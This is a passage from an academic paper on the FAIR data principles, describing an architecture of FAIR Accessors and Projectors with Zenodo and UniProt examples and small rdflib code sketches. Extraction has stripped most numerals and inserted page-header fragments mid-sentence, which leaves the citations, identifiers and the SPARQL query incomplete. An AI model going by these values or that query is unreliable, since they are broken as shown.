all of these service-oriented projects enjoyed success within the community that adopted their approach; however, the size of these adopting communities has, to date, remained quite limited, and they are in some cases highly domain-specific. moreover, each of these solutions is focused on web service functionality, which represents only a small portion of the global data archive, where most data is published as static records. service-oriented approaches additionally require data publishers to have considerable coding expertise and access to a server in order to utilize the standard, which further limits their utility with respect to the 'lay' data publishers that make up the majority of the scholarly community. as such, these and numerous other interoperability initiatives, spanning multiple decades, have yet to convincingly achieve a lightweight, broadly domain-applicable solution that works over a wide variety of static and dynamic source data resources and can be implemented with minimal technical expertise.
there are many stakeholders who would benefit from progress in this endeavour: scientists themselves, acting as both producers and consumers of these public and private data; public and private research-oriented agencies; journals and professional data publishers, both "general purpose" and "special purpose"; research funders who have paid for the underlying research to be conducted; data centres (e.g., the ebi (cook et al., ) and the sib (sib swiss institute of bioinformatics members, )) who curate and host these data on behalf of the research community; research infrastructures such as bbmri-eric (van ommen et al., ) and elixir (crosswell & thornton, ); and diverse others.
all of these stakeholders have distinct needs with respect to the behaviours of the scholarly data infrastructure. scientists, for example, need to access research datasets in order to initiate integrative analyses, while funding agencies and review panels may be more interested in the metadata associated with a data deposition—for example, the number of views or downloads, and the selected license. due to the diversity of stakeholders; the size, nature/format, and distribution of data assets; the need to support freedom-of-choice of all stakeholders; respect for privacy; acknowledgment of data ownership; and recognition of the limited resources available to both data producers and data hosts, we see this endeavour as one of the grand challenges of escience.
in january , representatives of a range of stakeholders came together at the request of the netherlands escience centre and the dutch techcentre for life sciences (dtl) at the lorentz centre in leiden, the netherlands, to brainstorm and debate about how to further enhance infrastructures to support a data ecosystem for escience. from these discussions emerged the notion that the definition and widespread support of a minimal set of community-agreed guiding principles and practices could enable data providers and consumers—machines and humans alike—to more easily find, access, interoperate, and sensibly re-use the vast quantities of information being generated by contemporary data-intensive science. these principles and practices should enable a broad range of integrative and exploratory behaviours, and support a wide range of technology choices and implementations, just as the internet protocol (ip) provides a minimal layer that enables the creation of a vast array of data provision, consumption, and visualisation tools on the internet.
the main outcome of the workshop was the definition of the so-called fair guiding principles, aimed at publishing data in a format that is findable, accessible, interoperable and reusable by both machines and human users. the fair principles underwent a period of public discussion and elaboration, and were recently published (wilkinson et al., ). briefly, the principles state:
findable—data should be identified using globally unique, resolvable, and persistent identifiers, and should include machine-actionable contextual information that can be indexed to support human and machine discovery of that data.
accessible—identified data should be accessible, optimally by both humans and machines, using a clearly-defined protocol and, if necessary, with clearly-defined rules for authorization/authentication.
interoperable—data becomes interoperable when it is machine-actionable, using shared vocabularies and/or ontologies, inside of a syntactically and semantically machine-accessible format.
reusable—reusable data will first be compliant with the f, a, and i principles, but further, will be sufficiently well-described with, for example, contextual information, so it can be accurately linked or integrated, like-with-like, with other data sources; moreover, there should be sufficiently rich provenance information so reused data can be properly cited.
while the principles describe the desired features that data publications should exhibit to encourage maximal, automated discovery and reuse, they provide little guidance regarding how to achieve these goals.
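to make the intent of these principles more concrete, the following minimal sketch (in python, using the rdflib library) assembles a machine-actionable metadata description of a hypothetical data deposit: a resolvable identifier, shared vocabularies (dcat and dublin core), an explicit licence, and a landing page. the identifier, title, creator and licence values are illustrative assumptions only, not part of any published principle or implementation.

```python
# minimal sketch of machine-actionable metadata for a data deposit, using shared
# vocabularies (dcat, dublin core). all concrete values below are illustrative.
from rdflib import Graph, Literal, URIRef, Namespace
from rdflib.namespace import DCTERMS, RDF

DCAT = Namespace("http://www.w3.org/ns/dcat#")

dataset = URIRef("https://example.org/dataset/123")  # hypothetical persistent identifier

g = Graph()
g.bind("dcat", DCAT)
g.bind("dcterms", DCTERMS)

g.add((dataset, RDF.type, DCAT.Dataset))
g.add((dataset, DCTERMS.title, Literal("example heatmap collection")))
g.add((dataset, DCTERMS.creator, Literal("a. researcher")))
g.add((dataset, DCTERMS.license, URIRef("https://creativecommons.org/licenses/by/4.0/")))
g.add((dataset, DCAT.landingPage, URIRef("https://example.org/dataset/123.html")))

print(g.serialize(format="turtle"))
```

a description of this kind can be indexed for discovery (findable), retrieved over a standard protocol (accessible), interpreted through shared vocabularies (interoperable), and reused under a clearly stated licence (reusable).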
this poses a problem when key organizations are already endorsing, or even requiring, adherence to the fair principles. for example, a biological research group has conducted an experiment to examine polyadenylation site usage in the pathogenic fungus magnaporthe oryzae, recording, by high-throughput ′-end sequencing, the preference of alternative polyadenylation site selection under a variety of growth conditions, and during infection of the host plant. the resulting data take the form of study-specific excel spreadsheets, bed alignment graphs, and pie charts of protein functional annotations. unlike genome or protein sequences and microarray outputs, there is no public curated repository for these types of data, yet the data are useful to other researchers, and should be (at a minimum) easily discovered and interpreted by reviewers or third-party research groups attempting to replicate their results. moreover, their funding agency and their preferred scientific journal both require that they publish their source data in an open public archive according to the fair principles. at this time, the commonly used general-purpose data archival resources in this domain do not explicitly provide support for fair, nor do they provide tooling or even guidance for how to use their archival facilities in a fair-compliant manner. as such, the biological research team, with little or no experience in formal data publishing, must nevertheless self-direct their data archival in a fair manner. we believe that this scenario will be extremely common throughout all domains of research, and thus this use-case was the initial focus for this interoperability infrastructure and fair data publication prototype.
here we describe a novel interoperability architecture that combines three pre-existing web technologies to enhance the discovery, integration, and reuse of data in repositories that lack or have incompatible apis; data in formats that normally would not be considered interoperable, such as excel spreadsheets and flat-files; or even data that would normally be considered interoperable but does not use the desired vocabulary standards. we examine the extent to which the features of this architecture comply with the fair principles, and suggest that this might be considered a "reference implementation" for the fair principles, in particular as applied to non-interoperable data in any general- or special-purpose repository. we provide two exemplars of usage. the first is focused on a use-case similar to that presented above, where we use our proposed infrastructure to create a fair, self-archived scholarly deposit of biological data in the general-purpose zenodo repository. the second, more complex example has two objectives: first, to use the infrastructure to improve the transparency and fairness of metadata describing the inclusion criteria for a dataset representing a subset of a special-purpose, curated resource (uniprot); and second, to show how even the already fair data within uniprot may be transformed to increase its fairness even more, by making it interoperable with alternative ontologies and vocabularies and more explicitly connecting it to citation information. finally, we place this work in the context of other initiatives and demonstrate that it is complementary to, rather than in competition with, those initiatives.
methods
implementation
overview of technical decisions and their justification
the world wide web consortium's (w3c) resource description framework (rdf) offers the ability to describe entities, their attributes, and their relationships with explicit
finally, it was important that the data host/provider is not necessarily a participant in making their data interoperable—rather, the interoperability solution should be capable of adapting existing data with or without the source provider’s participation. this ensures that the interoperability objectives can be pursued for projects with limited resourcing, that ‘abandoned’ datasets may still participate in the interoperability framework, but most importantly, that those with the needs and the resources should adopt the responsibility for making their data-of-interest interoperable, even if it is not owned by them. this distributes wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the problem of migrating data to interoperable formats over the maximum number of stakeholders, and ensures that the most crucial resources—those with the most demand for interoperability—become the earliest targets for migration. with these considerations in mind, we were inspired by three existing technologies whose features were used in a novel combination to create an interoperability infrastructure for both data and metadata, that is intended to also addresses the full range of fair requirements. briefly, the selected technologies are: ( ) the w c’s linked data platform (speicher, arwe & malhotra, ). we generated a model for hierarchical dataset containers that is inspired by the concept of a linked data platform (ldp) container, and the ldp’s use of the data catalogue vocabulary (dcat, maali, erickson & archer, ) for describing datasets, data elements, and distributions of those data elements. we also adopt the dcat’s use of simple knowledge organization system (skos, miles & bechhofer, ) concept schemes as a way to ontologically describe the content of a dataset or data record. ( ) the rdf mappinglanguage (rml, dimou et al., ). rml allows us to describe one or more possible rdf representations for any given dataset, and do so in a manner that is, itself, fair: every sub-component of an rml model is findable, accessible, interoperable, and reusable. moreover, for many common semi-structured data, there are generic tools that utilize rml models to dynamically drive the transformation of data from these opaque representations into interoperable representations (https://github.com/rmlio/rml-mapper). ( ) triple pattern fragments (tpf—verborgh et al., ). a tpf interface is a rest web api to retrieve rdf data from data sources in any native format. a tpf server accepts urls that represent triple patterns [subject, predicate, object], where any of these three elements may be constant or variable, and returns rdf triples from its data source that match those patterns. such patterns can be used to obtain entire datasets, slices through datasets, or individual data points even down to a single triple (essentially a single cell in a spreadsheet table). instead of relying on a standardized contract between servers and clients, a tpf interface is self-describing such that automated clients can discover the interface and its data. we will now describe in detail how we have applied key features of these technologies, in combination, to provide a novel data discoverability architecture. we will later demonstrate that this combination of technologies also enables both metadata and data-level interoperability even between opaque objects such as flat-files, allowing the data within these objects to be queried in parallel with other data on the semantic web. 
metadata interoperability—the “fair accessor” and the linked data platform the linked data platform ‘‘defines a set of rules for http operations on web resources...to provide an architecture for read-write linked data on the web’’ (https://www.w .org/tr/ ldp/). all entities and concepts are identified by urls, with machine-readable metadata describing the function or purpose of each url and the nature of the resource that will be returned when that url is resolved. wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rmlio/rml-mapper https://www.w .org/tr/ldp/ https://www.w .org/tr/ldp/ http://dx.doi.org/ . /peerj-cs. figure the two layers of the fair accessor. inspired by the ldp container, there are two resources in the fair accessor. the first resource is a container, which responds to an http get request by providing fair metadata about a composite research object, and optionally a list of urls representing metarecords that describe individual components within the collection. the metarecord resources resolve by http get to documents containing metadata about an individual data component and, optionally, a set of links structured as dcat distributions that lead to various representations of that data. within theldpspecification is theconcept ofan ldpcontainer. a basicimplementation of ldp containers involves two ‘‘kinds’’ of resources, as diagrammed in fig. . the first type of resource represents the container—a metadata document that describes the shared features of a collection of resources, and (optionally) the membership of that collection. this is analogous to, for example, a metadata document describing a data repository, where the repository itself has features (ownership, curation policy, etc.) that are independent from the individual data records within that repository (i.e., the members of the collection). the second type of resource describes a member of the contained collection and (optionally) provides ways to access the record itself. our implementation, which we refer to as the ‘‘fair accessor’’, utilizes the container concept described by the ldp, however, it does not require a full implementation of ldp, as we only require read functionality. in addition, other requirements of ldp would wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. have added complexity without notable benefit. our implementation, therefore, has two resource types based on the ldp container described above, with the following specific features: container resource: this is a composite research object (of any kind - repository, repository-record, database, dataset, data-slice, workflow, etc.). its representation could include scope or knowledge-domain covered, authorship/ownership of the object, latest update, version number, curation policy, and so forth. this metadata may or may not include urls representing metarecord resources (described below) that comprise the individual elements within the composite object. notably, the container url provides a resolvable identifier independent from the identifier of the dataset being described; in fact, the dataset may not have an identifier, as would be the case, for example, where the container represents a dynamically-generated data-slice. in addition, containers may be published by anyone—that is, the publisher of a container may be independent from the publisher of the research object it is describing. 
this enables one of the objectives of our interoperability layer implementation—that anyone can publish metadata about any research object, thus making those objects more fair.

metarecord resource: this is a specific element within a collection (data point, record, study, service, etc.). its representation should include information regarding licensing and accessibility, access protocols, rich citation information, and other descriptive metadata. it also includes a reference to the container(s) of which it is a member (the container url). finally, the metarecord may include further urls that provide direct access to the data itself, with an explicit reference to the associated data format by its mime type (e.g., text/html, application/json, application/vnd.ms-excel, text/csv, etc.). this is achieved using constructs from the data catalogue vocabulary (dcat; w3c, ), which defines the concept of a data "distribution", including metadata facets such as the data source url and its format. the lower part of fig. diagrams how multiple dcat distributions may be a part of a single metarecord. as with container resources, metarecords may be published by anyone, and independently of the original data publisher.

in summary, the fair accessor shares commonalities with the linked data platform, but additionally recommends the inclusion of rich contextual metadata, based on the fair principles, that facilitates discovery and interoperability of repository- and record-level information. the fair accessor is read-only, utilizing only http get together with widely-used semantic frameworks to guide both human and machine exploration. importantly, the lack of a novel api means that the information is accessible to generic web-crawling agents, and may also be processed if that agent "understands" the vocabularies used. thus, in simplistic terms, the accessor can be envisioned as a series of web pages, each containing metadata and hyperlinks to more detailed metadata and/or data, where the metadata elements and relationships between the pages are explicitly explained to web crawlers. to help clarify this component prior to presenting the more complex components of our interoperability proposal, we will now explore our first use case: data self-archival.

a simple fair accessor has been published online (rodriguez iglesias et al., ) in the zenodo general-purpose repository. the data self-archival in this citation represents a scenario similar to the polyadenylation use-case described in the introduction section. in this case, the data describes the evolutionary conservation of components of the rna metabolism pathway in fungi as a series of heatmap images. the data deposit includes a file 'rname_accessor.rdf' which acts as the container resource. this document includes metadata about the deposit (authorship, topic, etc.), together with a series of 'contains' relationships referring to metarecords inside the file 'rname_accessor_metarecords.rdf'. each metarecord is about one of the heatmaps and, in addition to metadata about the image, includes a link to the associated image (datatype image/png) and a link to an rdf representation of the same information represented by that image (datatype application/rdf+xml). it should be noted that much of the content of those accessor files was created using a text editor, based on template rdf documents.
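to make the hand-authored container idea concrete, the following is a minimal sketch of our own (not one of the published exemplar files), assuming a hypothetical deposit and placeholder urls; a container document is simply a small rdf file that can be drafted from a template and checked for well-formedness with an off-the-shelf library such as rdflib before being deposited.

# minimal, hypothetical container resource for a fair accessor, authored as
# static turtle and validated with rdflib; all urls below are placeholders
from rdflib import Graph

container_ttl = """
@prefix dcat: <http://www.w3.org/ns/dcat#> .
@prefix dc:   <http://purl.org/dc/elements/1.1/> .
@prefix ldp:  <http://www.w3.org/ns/ldp#> .

<http://example.org/accessor/mydata>
    a ldp:BasicContainer, dcat:Dataset ;
    dc:title   "heatmaps of rna metabolism conservation (example)" ;
    dc:license <https://creativecommons.org/licenses/by/4.0/> ;
    dcat:keyword "fungi", "rna processing" ;
    # each ldp:contains value is a metarecord resource describing one element
    ldp:contains <http://example.org/accessor/mydata/record1>,
                 <http://example.org/accessor/mydata/record2> .
"""

g = Graph().parse(data=container_ttl, format="turtle")
print(len(g), "triples parsed")   # well-formed document, ready to deposit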
the structure of these two documents are described in more detail in the results section, which includes a full walk-through of a more complex exemplar accessor. at the metadata level, therefore, this portion of the interoperability architecture provides a high degree of fairness by allowing machines to discover and interpret useful metadata, and link it with the associated data deposits, even in the case of a repository that provides no fair-support. nevertheless, these components do not significantly enhance the fairness and interoperability of the data itself, which was a key goal for this project. we will now describe the application of two recently-published web technologies—triple pattern fragments and rml—to the problem of data-level interoperability. we will show that these two technologies can be combined to provide an api-free common interface that may be used to serve, in a machine-readable way, fair data transformations (either from non-fair data, or transformations of fair data into novel ontological frameworks). we will also demonstrate how this fair data republishing layer can be integrated into the fair accessor to provide a machine-traversable path for incremental drill-down from high-level repository metadata all the way through to individual data points within a record, and back. data interoperability: discovery of compatible data through rml-based fair profiles in our approach to data-level interoperability, we first identified a number of desiderata that the solution should exhibit: . view-harmonization over dissimilar datatypes, allowing discovery of potentially integrable data within non-integrable formats. . support for a multitude of source data formats (xml, excel, csv, json, binary, etc.) . ‘‘cell-level’’ discovery and interoperability (referring to a ‘‘cell’’ in a spreadsheet) . modularity, such that a user can make interoperable only the data component of- interest to them . reusability, avoiding ‘‘one-solution-per-record’’ and minimizing effort/waste . must use standard technologies, and reuse existing vocabularies . should not require the participation of the data host (for public data). the approach we selected was based on the premise that data, in any format, could be metamodelled as a first step towards interoperability; i.e., the salient data-types and wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. relationships within an opaque data ‘‘blob’’ could be described in a machine-readable manner. the metamodels of two data sources could then be compared to determine if their contained data was, in principle, integrable. we referred to these metamodels as ‘‘fair profiles’’, and we further noted that we should support multiple metamodels of the same data, differing in structure or ontological/semantic framework, within a fair profile. for example, a data record containing blood pressure information might have a fair profile where this facet is modelled using both the snomed vocabulary and the icd vocabulary, since the data facet can be understood using either. we acknowledge that these meta-modelling concepts are not novel, and have been suggested by a variety of other projects such as dcat and dublin core (the dc application profile (heery & patel, )), and have been extensively described by the iso standard for ‘‘metadata registries’’. it was then necessary to select a modelling framework for fair profiles capable of representing arbitrary, and possibly redundant, semantic models. 
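to illustrate the intent (our own sketch, not a formalism from this work), a fair profile can be thought of as a set of [subject type, predicate, object type] patterns describing the views a data source supports, possibly with redundant views of the same facet; two sources become candidates for integration when their pattern sets overlap. all term names below are hypothetical placeholders, and the matching criterion (shared predicate and object type) is simply one plausible choice.

# hypothetical profiles for two data sources; each pattern is
# (subject type, predicate, object type); the same facet may be modelled
# redundantly, e.g., a snomed-style and an icd-style view of blood pressure
profile_dataset_a = {
    ("ex:PatientRecord", "ex:hasObservation", "snomedlike:BloodPressure"),
    ("ex:PatientRecord", "ex:hasObservation", "icdlike:BloodPressureCode"),
}
profile_dataset_b = {
    ("ex:ClinicalVisit", "ex:hasObservation", "icdlike:BloodPressureCode"),
}

# facets that could, in principle, be integrated across the two sources
shared = {p for p in profile_dataset_a
          if any(p[1:] == q[1:] for q in profile_dataset_b)}
print(shared)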
our investigation into relevant existing technologies and implementations revealed a relatively new, unofficial specification for a generic mapping language called the "rdf mapping language" (rml; dimou et al., ). rml is an extension of r2rml (das, sundara & cyganiak, ), a w3c recommendation for mapping relational databases to rdf, and is described as "a uniform mapping formalization for data in different format, which [enables] reuse and exchange between tools and applied data" (dimou et al., ). an rml map describes the triple structure (subject, predicate, object, abbreviated as [s,p,o]), the semantic types of the subject and object, and their constituent uri structures, that would result from a transformation of non-rdf data (of any kind) into rdf data. rml maps are modular documents where each component describes the schema for a single-resource-centric graph (i.e., a graph with all triples that share the same subject). the "object" position in each of these map modules may be mapped to a literal, or may be mapped to another rml module, thus allowing linkages between maps in much the same way that the object of an rdf triple may become the subject of another triple. rml modules may therefore be assembled into a complete map representing both the structure and the semantics of an rdf representation of a data source. rml maps themselves take the form of rdf documents, and can be published on the web, discovered, and reused via standard web technologies and protocols. rml therefore fulfils each of the desiderata for fair profiles, and as such, we selected this technology as the candidate for their implementation. compared with related technologies, this portion of our interoperability prototype serves a similar purpose to the xml schema (xsd; fallside & walmsley, ) definitions within the output component of a web services description language (wsdl) document, but unlike xsd, is capable of describing the structure and semantics of rdf graphs.

of particular interest to us was the modularity of rml—its ability to model individual triples. this speaks directly to our desiderata, where we do not wish to require (and should not expect) a modeller to invest the time and effort required to fully model every facet of a potentially very complex dataset. far more often, individuals will have an interest in only one or a few facets of a dataset. as such, we chose to utilize rml models at their highest level of granularity—that is, we require a distinct rml model for each triple pattern (subject+type, predicate, object+type) of interest. we call these small rml models "triple descriptors".

figure: diagram of the structure of an exemplar triple descriptor representing a hypothetical record of a snp in a patient's genome. in this descriptor, the subject will have the url structure http://example.org/patient/{id}, and the subject is of type patientrecord. the predicate is hasvariant, and the object will have url structure http://identifiers.org/dbsnp/{snp} with the rdf:type from the sequence ontology (which is the concept of a "snp"). the two nodes shaded green are of the same ontological type, showing the iterative nature of rml, and how individual rml triple descriptors will be concatenated into full fair profiles. the three nodes shaded yellow are the nodes that define the subject type, predicate and object type of the triple being described.
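because a triple descriptor is itself a small rdf document, the pattern it describes can be extracted mechanically. the following sketch is our own illustration (not software accompanying this work): it parses a hypothetical descriptor, loosely modelled on the snp example above and using only the r2rml portion of the vocabulary, and pulls out the subject class, predicate, and object class with rdflib; these are the values that would be compared across fair profiles.

# parse a hypothetical rml/r2rml triple descriptor and extract its
# (subject type, predicate, object type) pattern
from rdflib import Graph, Namespace

RR = Namespace("http://www.w3.org/ns/r2rml#")

descriptor = """
@prefix rr: <http://www.w3.org/ns/r2rml#> .
@prefix ex: <http://example.org/ontology/> .

<#PatientMap>
    rr:subjectMap [ rr:class ex:PatientRecord ;
                    rr:template "http://example.org/patient/{id}" ] ;
    rr:predicateObjectMap [ rr:predicate ex:hasVariant ;
                            rr:objectMap [ rr:parentTriplesMap <#SNPMap> ] ] .

<#SNPMap>
    rr:subjectMap [ rr:class ex:SNP ;
                    rr:template "http://identifiers.org/dbsnp/{snp}" ] .
"""

g = Graph().parse(data=descriptor, format="turtle")

def pattern(graph):
    """return the (subject class, predicate, object class) described by the map."""
    for tmap in graph.subjects(RR.predicateObjectMap, None):
        s_class = graph.value(graph.value(tmap, RR.subjectMap), RR["class"])
        pom     = graph.value(tmap, RR.predicateObjectMap)
        pred    = graph.value(pom, RR.predicate)
        parent  = graph.value(graph.value(pom, RR.objectMap), RR.parentTriplesMap)
        o_class = graph.value(graph.value(parent, RR.subjectMap), RR["class"])
        return (s_class, pred, o_class)

print(pattern(g))   # -> the patient-record class, hasVariant, and the snp class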
an exemplar triple descriptor is diagrammed in fig. . there may be many triple descriptors associated with a single data resource. moreover, multiple triple descriptors may model the same facet within that data resource, using different uri structures, subject/object semantic types, or predicates, thus acting as different "views" of that data facet. finally, then, the aggregation of all triple descriptors associated with a specific data resource produces a fair profile of that data. note that fair profiles are not necessarily comprehensive; however, by aggregating the efforts of all modellers, fair profiles model only the data facets that are most important to the community.

fair profiles enable view harmonization over compatible but structurally non-integrable data, possibly in distinct repositories. the profiles of one data resource can be compared to the profiles of another data resource to identify commonalities between their triple descriptors at the semantic level, even if the underlying data is semantically opaque and/or structurally distinct—a key step toward interoperability. fair profiles, therefore, have utility independent of any actuated transformation of the underlying data, in that they facilitate compatible data discovery. moreover, with respect to our desiderata, triple descriptors, and sometimes entire fair profiles, are rdf documents published on the web, and therefore may be reused to describe new data resources, anywhere on the web, that contain similar data elements, regardless of the native representation of that new resource, further simplifying the goal of data harmonization.

data interoperability: data transformation with fair projectors and triple pattern fragments

the ability to identify potentially integrable data within opaque file formats is, itself, a notable achievement compared to the status quo. nevertheless, beyond just discovery of relevant data, our interoperability layer aims to support and facilitate cross-resource data integration and query answering. this requires that the data is not only semantically described, but is also semantically and syntactically transformed into a common structure. having just presented a mechanism to describe the structure and semantics of data—triple descriptors in rml—what remains lacking is a way to retrieve data consistent with those triple descriptors. we require a means to expose transformed data without worsening the existing critical barrier to interoperability—opaque, non-machine-readable interfaces and api proliferation (verborgh & dumontier, ). what is required is a universally-applicable way of retrieving data generated by a (user-defined) data extraction or transformation process, that does not result in yet another api. the triple pattern fragments (tpf) specification (verborgh et al., ) defines a rest interface for publishing triples. the server receives http get calls on urls that contain a triple pattern [s,p,o], where any component of that pattern is either a constant or a variable. in response, a tpf server returns pages with all triples from its data source that match the incoming pattern. as such, any given triple pattern has a distinct url (a sketch of how such urls can be constructed follows below). we propose, therefore, to combine three elements—data transformed into rdf, which is described by triple descriptors, and served via tpf-compliant urls. we call this combination of technologies a "fair projector".
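as a minimal illustration of "a distinct url per triple pattern" (our own sketch; the base url is a placeholder, and the subject/predicate/object query parameters follow the convention used by the tpf urls shown later in the exemplar metarecord):

# construct tpf-style urls for a few triple patterns against a hypothetical server
from urllib.parse import urlencode

BASE = "http://example.org/fragments"   # placeholder tpf endpoint

def fragment_url(subject=None, predicate=None, obj=None):
    """any bound slot becomes a query parameter; unbound slots remain variable."""
    params = {k: v for k, v in
              [("subject", subject), ("predicate", predicate), ("object", obj)]
              if v is not None}
    return BASE + "?" + urlencode(params) if params else BASE

# an all-variable pattern, a predicate-bound 'slice', and a fully bound 'cell'
print(fragment_url())
print(fragment_url(predicate="http://purl.uniprot.org/core/classifiedWith"))
print(fragment_url(subject="http://identifiers.org/uniprot/EXAMPLE",
                   predicate="http://purl.uniprot.org/core/classifiedWith"))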
a fair projector, therefore, is a web resource (i.e., something identified by a url) that is associated with both a particular data source and a particular triple descriptor. calling http get on the url of the fair projector produces rdf triples from the data source that match the format defined by that projector's triple descriptor. the originating data source behind a projector may be a database, a data transformation script, an analytical web service, another fair projector, or any other static or dynamic data source. note that we do not include a transformation methodology in this proposal; however, we address this issue and provide suggestions in the discussion section. there may, of course, be multiple projectors associated with any given data source, serving a variety of triples representing different facets of that data.

linking the components: fair projectors and the fair accessor

at this point, we have a means for requesting triples with a particular structure—tpf servers—and we have a means of describing the structure and semantics of those triples—triple descriptors. together with a source of rdf data, these define a fair projector. however, we still lack a formal mechanism for linking tpf-compliant urls with their associated triple descriptors, such that the discovery of a triple descriptor with the desired semantics for a particular data resource also provides its associated projector url. we propose that this association can be accomplished, without defining any novel api or standard, if the output of a fair projector is considered a dcat distribution of a particular data source, and included within the metarecord of a fair accessor. the url of the projector, and its triple descriptor, become metadata facets of a new dcat:distribution element in the metarecord. this is diagrammed in fig. , where distribution_ and distribution_ include triple pattern fragment-formatted urls representing the fair projector, and the triple descriptor rml model describing the structure and semantics of the data returned by calling that projector. thus, all components of this interoperability system—from the top-level repository metadata to the individual data cell—are now associated with one another in a manner that allows mechanized data discovery, harmonization, and retrieval, including relevant citation information. no novel technology or api was required, thus allowing this rich combination of data and metadata to be explored using existing web tools and crawlers.

results

in the previous section, we provided the url to a simple exemplar fair accessor published on zenodo. to demonstrate the interoperability system in its entirety—including both the accessor and the projector components—we will now proceed through a second exemplar involving the special-purpose repository for protein sequence information, uniprot. in this example, we examine a fair accessor to a dataset, created through a database query, that consists of a specific "slice" of the protein records within the uniprot database—that is, the set of proteins in aspergillus nidulans fgsc a (ncbi taxonomy id ) that are annotated as being involved in mrna processing (gene ontology accession go: ). we first demonstrate the functionality of the two layers of the fair accessor in detail. we then demonstrate a fair projector, and show how its metadata integrates into the fair accessor.
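the walkthrough in the following subsections is performed manually, but a generic client could traverse the same two layers with nothing more than an http library and an rdf parser. the following is a minimal sketch of such a client (our illustration, with a placeholder accessor url, and assuming the server returns turtle via content negotiation).

# walk a hypothetical fair accessor: container -> metarecords -> distributions
import requests
from rdflib import Graph, Namespace

LDP  = Namespace("http://www.w3.org/ns/ldp#")
DCAT = Namespace("http://www.w3.org/ns/dcat#")
DC   = Namespace("http://purl.org/dc/elements/1.1/")

def get_graph(url):
    """http get a resource, asking for an rdf representation."""
    r = requests.get(url, headers={"Accept": "text/turtle"})
    r.raise_for_status()
    return Graph().parse(data=r.text, format="turtle")

container_url = "http://example.org/accessor/mydata"   # placeholder
container = get_graph(container_url)

for metarecord_url in container.objects(None, LDP.contains):
    metarecord = get_graph(metarecord_url)
    # each dcat distribution advertises a format (mime type) and a download url
    for dist in metarecord.objects(None, DCAT.distribution):
        fmt = metarecord.value(dist, DC.format)
        url = metarecord.value(dist, DCAT.downloadURL)
        print(metarecord_url, fmt, url)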
in this example, the projector modifies the ontological framework of the uniprot data such that the ontological terms used by uniprot are replaced by the terms specified in edam, an ontology of bioinformatics operations, datatypes, and formats (ison et al., ). we will demonstrate that this transformation is specified, in a machine-readable way, by the fair triple descriptor that accompanies each projector's metadata.

figure: integration of fair projectors into the fair accessor. resolving the metarecord resource returns a metadata document containing multiple dcat distributions for a given record, as in fig. . when a fair projector is available, additional dcat distributions are included in this metadata document. these distributions contain a url (purple text) representing a projector, and a triple descriptor that describes, in rml, the structure and semantics of the triple(s) that will be obtained from that projector resource if it is resolved. these triple descriptors may be aggregated into fair profiles, based on the record that they are associated with (record r, in the figure), to give a full mapping of all available representations of the data present in record r.

the two-step fair accessor

the example fair accessor accesses a database of rdf hosted by uniprot, and issues the following query over that database (expressed in the standard rdf query language, sparql):

prefix up:<http://purl.uniprot.org/core/>
prefix taxon:<http://purl.uniprot.org/taxonomy/>
prefix rdf:<http://www.w3.org/1999/02/22-rdf-syntax-ns#>
prefix go:<http://purl.obolibrary.org/obo/go_>
select distinct ?id
where {
  ?protein a up:Protein ;
           up:organism taxon: ;
           up:classifiedWith/rdfs:subClassOf go: .
  bind(substr(str(?protein), ) as ?id)
}

accessor output is retrieved from the container resource url:

http://linkeddata.systems/accessors/uniprotaccessor

the result of calling get on the container resource url is visualized in fig. , where tabulator (berners-lee et al., ) is used to render the output as html for human-readability. of particular note are the following metadata elements:

http://purl.org/dc/elements/1.1/license
    https://creativecommons.org/licenses/by-nd/ . /
http://purl.org/pav/authoredBy
    http://orcid.org/ - - - x
http://rdfs.org/ns/void#entities
a
    http://purl.org/dc/dcmitype/Dataset
    http://www.w3.org/ns/ldp#BasicContainer
    http://www.w3.org/ns/prov#Collection
http://www.w3.org/ns/dcat#contactPoint
    http://biordf.org/datafairport/miscrdf/wilkinson.rdf
http://www.w3.org/ns/dcat#keyword
    "aspergillus nidulans", "aspergillus", "proteins", "rna processing"
http://www.w3.org/ns/dcat#theme
    http://linkeddata.systems/conceptschemes/rna_processing_conceptscheme.rdf
http://www.w3.org/ns/ldp#contains
    http://linkeddata.systems/cgi-bin/accessors/uniprotaccessor/c vil
    http://linkeddata.systems/cgi-bin/accessors/uniprotaccessor/c v b
    ...

• license information is provided as an html + rdfa document, following one of the primary standard license forms published by creative commons. this allows the license to be unambiguously interpreted by both machines and people prior to accessing any data elements, an important feature that will be discussed later.
• authorship is provided by name, using the academic research project funding ontology (arpfo), but is also unambiguously provided by a link to the author's orcid, using the provenance authoring and versioning (pav; ciccarese et al., ) ontology.

• the repository descriptor is typed as being a dublin core dataset, a linked data platform container, and a provenance collection, allowing it to be interpreted by a variety of client agents, and conforming to several best-practices, such as the healthcare and life science dataset description guidelines (gray et al., ; dumontier et al., ).

• contact information is provided in a machine-readable manner via the friend of a friend (foaf) record of the author, and the dcat ontology "contactpoint" property.

• human-readable keywords, using dcat, are mirrored and/or enhanced by a machine-readable rdf document which is the value of the dcat "theme" property. this rdf document follows the structure determined by the simple knowledge organization system (skos) ontology, and lists the ontological terms that describe the repository for machine-processing.

• finally, individual records within the dataset are represented as the value of the linked data platform "contains" property, and provided as a possibly paginated list of urls (a discussion of machine-actionable pagination will not be included here). these urls are the metarecord resource urls shown in fig. .

figure: a representative portion of the output from resolving the container resource of the fair accessor, rendered into html by the tabulator firefox plugin. the three columns show the label of the subject node of all rdf triples (left), the label of the uri in the predicate position of each triple (middle), and the value of the object position (right), where blue text indicates that the value is a resource, and black text indicates that the value is a literal.

following the flow in fig. , the next step in the fair accessor is to resolve a metarecord resource url. for clarity, we will first show the metadata document that is returned if there are no fair projectors for that dataset.

figure: a representative (incomplete) portion of the output from resolving the metarecord resource of the fair accessor for record c v l (at http://linkeddata.systems/accessors/uniprotaccessor/c v l ), rendered into html by the tabulator firefox plugin. the columns have the same meaning as in fig. .
